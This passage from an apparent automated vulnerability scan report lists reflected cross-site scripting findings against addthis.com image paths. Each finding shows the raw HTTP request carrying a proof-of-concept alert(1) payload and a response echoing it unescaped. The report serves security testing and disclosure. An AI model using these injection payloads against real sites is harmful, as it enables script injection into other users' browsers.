GET /images4/internet_explorer/borderMiddleRight.png425bf<script>alert(1)</script>6ccdab0aff5 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=vssj08n5m2oitg5tme1gtffr06; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4/internet_explorer/borderMiddleRight.png425bf<script>alert(1)</script>6ccdab0aff5</strong>
...[SNIP]...

2.98. http://www.addthis.com/images4/internet_explorer/borderMiddleRight.png [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderMiddleRight.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53ad4"-alert(1)-"35b4f95dee9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images4/internet_explorer/borderMiddleRight.png53ad4"-alert(1)-"35b4f95dee9 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=fq7mivlqoql9472s5oac27utd0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/images4/internet_explorer/borderMiddleRight.png53ad4"-alert(1)-"35b4f95dee9";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);
gaPageTrac
...[SNIP]...

2.99. http://www.addthis.com/images4/internet_explorer/borderMiddleRight.png [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderMiddleRight.png

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 516db<script>alert(1)</script>f040b9564e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4/internet_explorer/borderMiddleRight.png?516db<script>alert(1)</script>f040b9564e8=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=cfm7pg56in78t1fij2dertsfe6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1410

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4/internet_explorer/borderMiddleRight.png?516db<script>alert(1)</script>f040b9564e8=1</strong>
...[SNIP]...

2.100. http://www.addthis.com/images4/internet_explorer/borderTopCenter.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderTopCenter.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49b23"-alert(1)-"c21a3f791be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images449b23"-alert(1)-"c21a3f791be/internet_explorer/borderTopCenter.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=tf0oj80etn3odaieq6kes8gf73; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1418

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/images449b23"-alert(1)-"c21a3f791be/internet_explorer/borderTopCenter.png";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVa
...[SNIP]...

2.101. http://www.addthis.com/images4/internet_explorer/borderTopCenter.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderTopCenter.png

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ef533<script>alert(1)</script>7eb1d6ca9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4ef533<script>alert(1)</script>7eb1d6ca9/internet_explorer/borderTopCenter.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=4bkpahacmprtnidqbpbt8k5072; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4ef533<script>alert(1)</script>7eb1d6ca9/internet_explorer/borderTopCenter.png</strong>
...[SNIP]...

2.102. http://www.addthis.com/images4/internet_explorer/borderTopCenter.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderTopCenter.png

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 50c9e<script>alert(1)</script>99c7db39ff3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4/internet_explorer50c9e<script>alert(1)</script>99c7db39ff3/borderTopCenter.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=0s2cek48llcnmo3k6rcveun6g1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4/internet_explorer50c9e<script>alert(1)</script>99c7db39ff3/borderTopCenter.png</strong>
...[SNIP]...

2.103. http://www.addthis.com/images4/internet_explorer/borderTopCenter.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderTopCenter.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7602"-alert(1)-"8ddbf3d5732 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images4/internet_explorerb7602"-alert(1)-"8ddbf3d5732/borderTopCenter.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=hrgdku6nalod54ikbm4i9enl40; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1418

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/images4/internet_explorerb7602"-alert(1)-"8ddbf3d5732/borderTopCenter.png";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False
...[SNIP]...

2.104. http://www.addthis.com/images4/internet_explorer/borderTopCenter.png [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderTopCenter.png

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload de468<script>alert(1)</script>f46c124be96 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4/internet_explorer/borderTopCenter.pngde468<script>alert(1)</script>f46c124be96 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=6q2p2bn2p8i7mi4rul9crgmke1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4/internet_explorer/borderTopCenter.pngde468<script>alert(1)</script>f46c124be96</strong>
...[SNIP]...

2.105. http://www.addthis.com/images4/internet_explorer/borderTopCenter.png [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderTopCenter.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 955d8"-alert(1)-"82efe82cc13 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images4/internet_explorer/borderTopCenter.png955d8"-alert(1)-"82efe82cc13 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=7qvbok008889i4c37thuk7hcc7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1418

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/images4/internet_explorer/borderTopCenter.png955d8"-alert(1)-"82efe82cc13";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);
gaPageTrac
...[SNIP]...

2.106. http://www.addthis.com/images4/internet_explorer/borderTopCenter.png [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderTopCenter.png

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 17cd6<script>alert(1)</script>86e7c2cbd22 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4/internet_explorer/borderTopCenter.png?17cd6<script>alert(1)</script>86e7c2cbd22=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=smkmrgpsdroj2kr075vphb5jc1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4/internet_explorer/borderTopCenter.png?17cd6<script>alert(1)</script>86e7c2cbd22=1</strong>
...[SNIP]...

2.107. http://www.addthis.com/images4/internet_explorer/borderTopLeft.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderTopLeft.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc518"-alert(1)-"f1cfe41399d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images4dc518"-alert(1)-"f1cfe41399d/internet_explorer/borderTopLeft.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=l9lv65biomm4f7ofdsg4v0g9s3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/images4dc518"-alert(1)-"f1cfe41399d/internet_explorer/borderTopLeft.png";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(
...[SNIP]...

2.108. http://www.addthis.com/images4/internet_explorer/borderTopLeft.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderTopLeft.png

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f69a7<script>alert(1)</script>a1a7e8cd1f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4f69a7<script>alert(1)</script>a1a7e8cd1f/internet_explorer/borderTopLeft.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=1na2s64bumaf4l1nunihjdvfb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4f69a7<script>alert(1)</script>a1a7e8cd1f/internet_explorer/borderTopLeft.png</strong>
...[SNIP]...

2.109. http://www.addthis.com/images4/internet_explorer/borderTopLeft.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderTopLeft.png

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 60688<script>alert(1)</script>c7dc552a028 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4/internet_explorer60688<script>alert(1)</script>c7dc552a028/borderTopLeft.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=109gpm74ke2779foikr4b3dq31; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4/internet_explorer60688<script>alert(1)</script>c7dc552a028/borderTopLeft.png</strong>
...[SNIP]...

2.110. http://www.addthis.com/images4/internet_explorer/borderTopLeft.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderTopLeft.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b5d1"-alert(1)-"15fc8c1a3ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images4/internet_explorer6b5d1"-alert(1)-"15fc8c1a3ec/borderTopLeft.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=p32qop8fcu4haqknhe5trin416; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/images4/internet_explorer6b5d1"-alert(1)-"15fc8c1a3ec/borderTopLeft.png";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",
...[SNIP]...

2.111. http://www.addthis.com/images4/internet_explorer/borderTopLeft.png [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderTopLeft.png

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1eb0d<script>alert(1)</script>5b1a8fdd449 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4/internet_explorer/borderTopLeft.png1eb0d<script>alert(1)</script>5b1a8fdd449 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=kr40h6vh5v5a37ll0lahurhqe7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4/internet_explorer/borderTopLeft.png1eb0d<script>alert(1)</script>5b1a8fdd449</strong>
...[SNIP]...

2.112. http://www.addthis.com/images4/internet_explorer/borderTopLeft.png [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderTopLeft.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad936"-alert(1)-"040809406b5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

